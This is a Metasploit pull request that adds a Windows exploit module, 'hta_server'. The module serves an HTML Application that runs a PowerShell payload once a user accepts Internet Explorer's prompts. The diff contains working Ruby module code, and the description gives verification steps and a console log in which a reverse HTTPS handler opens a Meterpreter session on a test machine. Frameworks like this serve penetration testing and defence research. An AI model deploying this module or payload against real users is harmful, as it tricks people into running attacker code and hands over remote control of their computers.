### PR TITLE
Add an HTA server module using Powershell

### DIFF
--- a/modules/exploits/windows/misc/hta_server.rb
+++ b/modules/exploits/windows/misc/hta_server.rb
@@ -3,9 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-require 'msf/core/exploit/powershell'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 

--- a/modules/exploits/windows/misc/hta_server.rb
+++ b/modules/exploits/windows/misc/hta_server.rb
@@ -1,0 +1,59 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HTA Web Server',
+      'Description'    => %q(
+        This module hosts an HTML Application (HTA) that when opened will run a
+        payload via Powershell. When a user navigates to the HTA file they will
+        be prompted by IE twice before the payload is executed.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => 'Spencer McIntyre',
+      'References'     =>
+        [
+          ['URL', 'https://www.trustedsec.com/july-2015/malicious-htas/']
+        ],
+      # space is restricted by the powershell command limit
+      'Payload'        => { 'DisableNops' => true, 'Space' => 2048 },
+      'Platform'       => %w(win),
+      'Targets'        =>
+        [
+          [ 'Powershell x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ],
+          [ 'Powershell x64', { 'Platform' => 'win', 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Oct 06 2016'
+    ))
+  end
+
+  def on_request_uri(cli, _request)
+    print_status('Delivering Payload')
+    p = regenerate_payload(cli)
+    data = Msf::Util::EXE.to_executable_fmt(
+      framework,
+      target.arch,
+      target.platform,
+      p.encoded,
+      'hta-psh',
+      { :arch => target.arch, :platform => target.platform }
+    )
+    send_response(cli, data, 'Content-Type' => 'application/hta')
+  end
+
+  def random_uri
+    # uri needs to end in .hta for IE to process the file correctly
+    '/' + Rex::Text.rand_text_alphanumeric(rand(10) + 6) + '.hta'
+  end
+end


### PR DESCRIPTION
This PR adds a simple module for hosting an HTML Application (HTA) that delivers a payload with Powershell. Using this module successfully requires convincing a user to navigate to the page and accept the two prompts by IE before the payload is executed.
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/windows/misc/hta_server`
- [x] Set your options appropriately and execute the module
- [x] Load the page in Internet Explorer to simulate a target user
- [x] Accept Internet Explorer's prompt to both "Open" and "Allow"
- [x] Verify that after a few seconds you have a functioning session

Example output as tested with a Windows 8.1 x64 target

```
msf (S:0 J:0) exploit(hta_server) > exploit
[*] Exploit running as background job.
msf (S:0 J:1) exploit(hta_server) > 
[*] [2016.10.06-19:06:40] Started HTTPS reverse handler on https://192.168.254.132:8443
[*] [2016.10.06-19:06:40] Using URL: http://0.0.0.0:8080/CehQedX1uL4.hta
[*] [2016.10.06-19:06:40] Local IP: http://192.168.254.132:8080/CehQedX1uL4.hta
[*] [2016.10.06-19:06:40] Server started.
[*] [2016.10.06-19:07:06] 192.168.254.124  hta_server - Delivering Payload
[*] [2016.10.06-19:07:17] 192.168.254.124  hta_server - Delivering Payload
[*] [2016.10.06-19:07:33] https://192.168.254.132:8443 handling request from 192.168.254.124; (UUID: 7xbzpibl) Staging Native payload...
[*] Meterpreter session 1 opened (192.168.254.132:8443 -> 192.168.254.124:49182) at 2016-10-06 19:07:34 -0400

msf (S:1 J:1) exploit(hta_server) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINDOWS8VM\Spencer
meterpreter > sysinfo
Computer        : WINDOWS8VM
OS              : Windows 8.1 (Build 9600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > 
```
